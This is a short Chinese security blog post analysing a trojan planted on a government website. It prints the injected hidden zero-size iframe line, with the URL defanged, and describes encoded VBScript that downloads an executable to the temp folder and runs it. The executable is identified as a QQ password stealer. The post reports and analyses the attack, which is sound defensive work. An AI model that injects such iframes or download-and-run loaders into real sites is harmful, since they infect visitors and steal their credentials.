又一个被挂木马的政府网站(第3版)

简介: 又一个被挂木马的政府网站(第3版)

该网站首页末被加入代码:

/--------
<iframe src=hxxp://www.race***swd.com.**/w***m*.htm width=0 height=0 frameborder=0></iframe>
--------/

hxxp://www.race***swd.com.**/w***m*.htm  的内容为escape()编码的VBSctipt代码,其功能为利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 hxxp://www.race***swd.com.**/**1**.exe,保存为 %temp%/asde.exe,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。

**1**.exe  采用 tElock 0.80 -> tE! 加壳,文件长度为28,109 字节,Kaspersky  报为 Trojan-PSW.Win32.QQPass.mz,瑞星 报为 Trojan.PSW.QQPass.qbe。


相关文章
|
5月前
|
安全 数据安全/隐私保护
一个被挂木马的政府网站
一个被挂木马的政府网站
|
5月前
|
安全
一个被挂上木马的论坛
一个被挂上木马的论坛
|
安全 JavaScript
怎么防止网站不被挂木马篡改
因为说这些脚本文件它都是一些静态的文件连接,那么既然是静态的,那就是说我们存放这个脚本的这个服务器,它只能放静态文件,不支持任何的脚本语言,那它也就不可能存在任何的后门,也不可能被篡改挂木马,上传脚本后门文件等等这些问题,所以说只要替换成静态的连接文件,那么说你网站从此以后没人能修改这些静态的脚本文件,他如果想给网站挂木马的话,那只有其他的办法,那就是说给你网页插入一个新的脚本文件,那么他给你插一个新的脚本文件的话,我想普通的站长一眼就能看到,所以不需要到处去找,直接就可以把它移除掉,或者是我们可以配合一些网站的检测一些程序,检测你网站是否存在未知的文件,配合这样一些东西去方便快速的锁定,这个
282 0
怎么防止网站不被挂木马篡改
|
监控 安全 搜索推荐
公司网站老是被黑客攻击怎么办
在快速发展的移动互联网今天,受疫情的影响,大部分人都在家远程办公,依靠于移动互联网,许多的公司最不乐意见到的便是自个耗费精力设计的企业官网,在都还没有为公司赚的相应的收益的情况下,就已经被挂黑客攻击导致网站被挂木马,而且据SINE安全统计发现,现阶段许多的公司针对网站开发并不是很了解,不明白怎样监控和防止企业网站被攻击,被挂马的发生,因此,SINE安全工程师今日刻意为各位小结一点有关于网站安全监测企业网站的方法,希望能够更佳的帮助您经营自己公司网站。
229 0
公司网站老是被黑客攻击怎么办
|
安全 数据安全/隐私保护 Windows
|
Web App开发 安全
中国航运网遭遇挂马 黑客悄悄植入病毒
中国航运网(hxxp://www.zhongguohangyun.com/)被黑客植入病毒,用户如果访问该网页,系统就会自动从恶意网站上下载并运行恶意程序。被感染病毒的用户系统可能被远程控制,盗取用户敏感信息。
822 0
|
安全
网站长期被挂马 访问者屡遭木马侵害
据瑞星“云安全”系统监测,6月3日,“星空剧场”、“中国制造网”、“北京市路政局房山公路分局”等视频、商务和政府网站被黑客挂马,用户浏览这些网站后,会感染木马病毒:Worm.Win32.VB.vl(VB代理蠕虫),导致文件受损并下载大量木马。
949 0
|
安全
多家高校网站被挂马 用户应小心QQ盗号木马
据瑞星“云安全”系统统计,周末共有1123万人次的网民遭到网页挂马攻击,瑞星共截获了3,273,495个挂马网址,比上周同期有所上升。 当日被挂马网站Top5:   (注意:以下网址都带有病毒,请不要点击)     1、“北京大学公共卫生学院”:http://sph.bjmu.edu.cn/Html/downloads/index.htm,被嵌入的恶意网址为http://z.hg9*3.cn/d1/16/ytbf.htm等。
1306 0
|
安全
“极品时刻表”被挂马 已有6万网民遭攻击
3月9日,瑞星“云安全”系统提供的数据表明,网民中流行的“极品时刻表”软件被黑客挂马,截至发稿时为止,瑞星已拦截到66757人次网民遭到攻击。 瑞星安全专家表示,极品时刻表内嵌的网页被黑客植入木马,当用户使用该软件查询列车车次时,就会遭到攻击。
1029 0
|
安全
警惕“搜房网”“凯业房园”等网站被挂马
据瑞星“云安全”系统统计, 上周末期间,共有5,556,431人次的网民遭到网页挂马攻击,瑞星共截获了748,911个挂马网址。 周末最流行木马病毒是 Worm.Win32.Autorun.gbn(U盘蠕虫下载器)“云安全”系统共收到100,754次用户上报。
1824 0